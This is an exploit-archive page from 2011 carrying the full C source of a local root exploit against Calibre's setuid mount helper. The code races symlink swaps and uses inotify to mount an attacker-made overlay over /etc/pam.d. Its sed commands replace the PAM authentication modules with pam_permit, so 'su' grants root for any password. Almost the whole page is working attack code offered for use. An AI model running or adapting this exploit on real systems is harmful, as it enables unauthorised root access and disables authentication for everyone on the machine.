Calibre E-Book Reader Local Root



EKU-ID: 1269 CVE: OSVDB-ID:
Author: zx2c4 Published: 2011-11-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
 * ########################################################
 * #               .80 Calibrer Assault Mount             #
 * #                         by zx2c4                     #
 * ########################################################
 *
 * Yesterday's assult mount used inotify to mount into /etc/pam.d. Today we
 * expand the attack by adding a race toggler so we can mount from non-block
 * devices.
 *
 * Enjoy.
 *
 * - zx2c4
 * 2011-11-4
 *
 * greets to djrbliss
 *
 */


#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>

int main(int argc, char **argv)
{
 printf("########################################################\n");
 printf("#               .80 Calibrer Assault Mount             #\n");
 printf("#                         by zx2c4                     #\n");
  printf("########################################################\n\n");
 
 
 printf("[+] Cleaning up old cruft.\n");
 unlink("/dev/shm/overlay");
 system("calibre-mount-helper cleanup /dev/ram0 /media/staging/");
 
 printf("[+] Creating overlay container.\n");
 system("dd if=/dev/zero of=/dev/shm/overlay count=25600");
 system("/usr/sbin/mkfs.ntfs /dev/shm/overlay");
 
 printf("[+] Mounting staging using race condition toggler...\n");
 int childpid = fork();
 if (childpid) {
  int ret;
  while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /media/staging/ 2>&1")) == 256 || ret == 8192);
  kill(childpid, SIGKILL);
 } else {
  while (1) {
   rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
   symlink("/dev/ram0", "/dev/shm/overlay");
   unlink("/dev/shm/overlay");
   rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
  }
  return 0;
 }
 
 printf("[+] Preparing overlay with /etc/pam.d modification:\n");
 system("cp -v /etc/pam.d/* /media/staging/");
 system("sed -i \"s/pam_deny.so/pam_permit.so/g\" /media/staging/common-auth");
 system("sed -i \"s/pam_cracklib.so.*/pam_permit.so/g\" /media/staging/system-auth");
 system("sed -i \"s/pam_unix.so.*/pam_permit.so/g\" /media/staging/system-auth");
 
  
 printf("[+] Mounting overlay over /etc/pam.d using race condition toggler and inotify...\n");
 childpid = fork();
 if (childpid) {
  int childpid2 = fork();
  if (childpid2) {
   int ret;
   while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /etc/pam.d/ 2>&1")) == 256 || ret == 8192);
   kill(childpid, SIGKILL);
   kill(childpid2, SIGKILL);
  } else {
   while (1) {
    int fd;
    fd = inotify_init();
    unlink("/media/staging/fake");
    mkdir("/media/staging/fake");
    inotify_add_watch(fd, "/media/staging/fake", IN_CREATE);
    read(fd, 0, 0);
    rename("/media/staging/fake", "/media/staging/tmp");
    symlink("/etc/pam.d", "/media/staging/fake");
    rmdir("/media/staging/tmp");
    close(fd);
   }
  }
 } else {
  while (1) {
   rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
   symlink("/dev/ram0", "/dev/shm/overlay");
   unlink("/dev/shm/overlay");
   rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
  }
  return 0;
 }
 
 printf("[+] Asking for root. When prompted for a password, type anything and press enter.\n");
 system("su");
 
 return 0;
}